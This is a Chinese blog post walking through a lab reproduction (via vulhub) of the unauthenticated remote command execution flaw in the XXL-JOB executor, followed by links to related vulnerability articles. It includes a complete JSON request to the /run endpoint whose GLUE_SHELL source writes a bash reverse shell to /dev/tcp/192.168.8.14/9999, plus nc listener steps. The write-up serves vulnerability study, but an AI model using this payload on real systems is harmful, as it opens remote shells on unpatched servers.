xxl-job远程命令执行漏洞复现

9月前作者：大鸟安全分类：Toy博客阅读(44) 违法举报

这篇具有很好参考价值的文章主要介绍了xxl-job远程命令执行漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

1、漏洞描述

XXL-JOB是一个分布式任务调度平台，其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线，开箱即用。XXL-JOB分为admin和executor两端，前者为后台管理页面，后者是任务执行的客户端。executor默认没有配置认证，未授权的攻击者可以通过RESTful API执行任意命令。

2、靶场搭建

靶场使用vulhub
进入vulhub/xxl-job/unacc目录下，执行docker-compose up -d
xxl-job远程命令执行漏洞复现
容器起来后，docker ps -a看一下

浏览器访问http://your-ip:9999

看到如上图，说明漏洞环境部署成功。

3、漏洞复现（反弹shell）

浏览器访问http://your-ip:9999/run，并通过bp抓包
xxl-job远程命令执行漏洞复现

修改请求方式为POST ，并写入exp，然后发送请求

exp：

{
  "jobId": 1,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_SHELL",
  "glueSource": "echo 'bash -i >& /dev/tcp/192.168.8.14/9999 0>&1' > /tmp/1.sh",
  "glueUpdatetime": 1586699003758,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}

xxl-job远程命令执行漏洞复现
将/tmp/1.sh赋予可执行权限

开启nc监听

执行命令：

查看nc监听，反弹成功
文章来源地址https://www.toymoban.com/news/detail-503392.html

到了这里，关于xxl-job远程命令执行漏洞复现的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

XXL-JOB executor 未授权访问漏洞

XXL-JOB是一个分布式任务调度平台，其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线，开箱即用。XXL-JOB分为admin和executor两端，前者为后台管理页面，后者是任务执行的客户端。漏洞影响版本：=2.2.0 executor默认没有配

2024年02月11日
浏览(33)
【源码分析】XXL-JOB的执行器的注册流程

目的：分析xxl-job执行器的注册过程流程：获取执行器中所有被注解( @xxlJjob )修饰的 handler 执行器注册过程执行器中任务执行过程版本： xxl-job 2.3.1 建议：下载 xxl-job 源码，按流程图 debug 调试，看堆栈信息并按文章内容理解执行流程。完整流程图：部分流程图：首先启

2023年04月22日
浏览(46)
xxl-job中在分片的时候项目模块如何开启多个执行器？

在xxl-job中，要在分片时开启多个执行器，您需要按照以下步骤进行操作： 1.在xxl-job的项目中，找到对应的模块（即需要开启多个执行器的模块）。 2.在模块的配置文件（通常是application.properties或application.yml）中，找到以下属性： properties xxl.job.executor.appname= xxl.job.executor

2024年02月09日
浏览(40)
分布式定时任务系列8：XXL-job源码分析之远程调用

分布式定时任务系列1：XXL-job安装分布式定时任务系列2：XXL-job使用分布式定时任务系列3：任务执行引擎设计分布式定时任务系列4：任务执行引擎设计续分布式定时任务系列5：XXL-job中blockingQueue的应用分布式定时任务系列6：XXL-job触发日志过大引发的CPU告警分布式定时任

2024年01月21日
浏览(51)
【2023】XXL-Job 具体通过docker 配置安装容器，再通过springboot执行注册实现完整流程

在平时的业务场景中，经常有一些场景需要使用定时任务，比如：时间驱动的场景：某个时间点发送优惠券，发送短信等等。批量处理数据：批量统计上个月的账单，统计上个月销售数据等等。固定频率的场景：每隔5分钟需要执行一次。在Java中，传统的定时任务实现方案

2024年02月14日
浏览(37)
【漏洞复现】锐捷 EWEB auth 远程命令执行漏洞

免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

2024年03月12日
浏览(93)
多个安全厂商安全设备远程命令执行漏洞复现

此文章仅用于技术交流，严禁用于对外发起恶意攻击！！！该漏洞可执行远程代码 FOFA：body=“/webui/images/default/default/alert_close.jpg”

2024年02月03日
浏览(47)
漏洞复现 - - -Struts2(s2-045)远程命令执行漏洞

Struts2是一个基于MVC设计模式的Web应用框架，它本质上相当于一个servlet，在MVC设计模式中，Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品，是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与St

2024年01月20日
浏览(49)
漏洞复现-nginxWebUI runCmd前台远程命令执行漏洞（附漏洞检测脚本）

文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担

2024年04月17日
浏览(42)
CVE-2021-22205 GitLab 远程命令执行漏洞复现

目录一、漏洞信息二、环境搭建三、复现过程 1.测试漏洞 2.漏洞利用，反弹shell 四、修复建议一、漏洞信息漏洞名称 GITLAB 远程命令执行漏洞漏洞编号 CVE-2021-22205 危害等级高危 CVSS评分 6.5 漏洞厂商 Ruby 受影响版本 11.9 = Gitlab CE/EE 13.8.8；13.9 = Gitlab CE/EE 13.9.6；13.10 = Gitlab

2024年02月05日
浏览(45)